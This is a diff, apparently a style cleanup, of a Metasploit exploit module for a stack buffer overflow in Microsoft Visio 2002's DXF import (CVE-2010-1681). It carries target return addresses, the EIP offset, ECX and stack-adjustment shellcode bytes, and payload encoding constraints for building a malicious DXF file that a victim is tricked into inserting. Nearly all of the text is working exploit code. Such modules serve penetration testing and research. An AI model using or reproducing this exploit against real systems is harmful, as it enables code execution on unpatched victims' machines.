@@ -8,51 +8,48 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FILEFORMAT
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability',
+        'Description' => %q{
           This module exploits a stack based overflow vulnerability in the handling
-        of the DXF files by Microsoft Visio 2002. Revisions prior to the release of
-        the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application
-        is used to import a specially crafted DXF file, while parsing the HEADER section
-        of the DXF file.
+          of the DXF files by Microsoft Visio 2002. Revisions prior to the release of
+          the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application
+          is used to import a specially crafted DXF file, while parsing the HEADER section
+          of the DXF file.
 
-        To trigger the vulnerability an attacker must convince someone to insert a
-        specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'
+          To trigger the vulnerability an attacker must convince someone to insert a
+          specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'
         },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Unknown', # CORE Security, original discovery
           'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB #8 exploit and binary analysis
           'juan vazquez', # metasploit module
         ],
-      'References'     =>
-        [
-          [ 'CVE','2010-1681' ],
+        'References' => [
+          [ 'CVE', '2010-1681' ],
           [ 'OSVDB', '64446' ],
           [ 'BID', '39836' ],
           [ 'URL', 'http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow' ],
           [ 'URL', 'http://web.archive.org/web/20101113032001/http://www.exploit-db.com:80/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/' ],
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => true
         },
-      'Payload' =>
-        {
-          'Space'         => 2000,
-          'BadChars'      => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
-          'DisableNops'   => true, # no need
+        'Payload' => {
+          'Space' => 2000,
+          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
+          'DisableNops' => true, # no need
           'EncoderOptions' =>
-            {
-              'BufferRegister' => 'ECX'
-            }
+                        {
+                          'BufferRegister' => 'ECX'
+                        }
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           # Microsoft Office Visio 2002
           # VISIO.EXE v10.0.525.4
           # VISIODWG.DLL v10.0.525.4
@@ -65,28 +62,36 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Visio 2002 English on Windows XP SP3 Spanish',
             {
-              'Ret'         => 0x6173345c, # push esp, ret from VISIODWG.DLL
-              'Offset'      => 0x50,       # EIP
+              'Ret' => 0x6173345c, # push esp, ret from VISIODWG.DLL
+              'Offset' => 0x50, # EIP
               'ReadAddress' => 0x617a4748, # points to VISIODWG.DLL data segment
-              'ECXAdjust'   => 0x2D
+              'ECXAdjust' => 0x2D
             }
           ],
           [
             'Visio 2002 English on Windows XP SP3 English',
             {
-              'Ret'         => 0x60455F6B, # push esp, ret from VISLIB.DLL
-              'Offset'      => 0x50,       # EIP
+              'Ret' => 0x60455F6B, # push esp, ret from VISLIB.DLL
+              'Offset' => 0x50, # EIP
               'ReadAddress' => 0x66852040, # points to VISIODWG.DLL data segment
-              'ECXAdjust'   => 0x2D,
+              'ECXAdjust' => 0x2D,
             }
           ],
         ],
-      'DisclosureDate' => '2010-05-04'))
+        'DisclosureDate' => '2010-05-04',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
-        OptString.new('FILENAME',   [ true, 'The file name.',  'msf.dxf']),
-      ])
+        OptString.new('FILENAME', [ true, 'The file name.', 'msf.dxf']),
+      ]
+    )
   end
 
   def exploit
@@ -105,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     content << "\x54" # push esp
     content << "\x59" # pop ecx
     # ecx adjustment
-    content << Rex::Arch::X86.sub(-(target['ECXAdjust']),Rex::Arch::X86::ECX, "\x00\x0d\x0a", false, true)
+    content << Rex::Arch::X86.sub(-(target['ECXAdjust']), Rex::Arch::X86::ECX, "\x00\x0d\x0a", false, true)
     # Stack adjustment
     content << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000
     content << payload.encoded
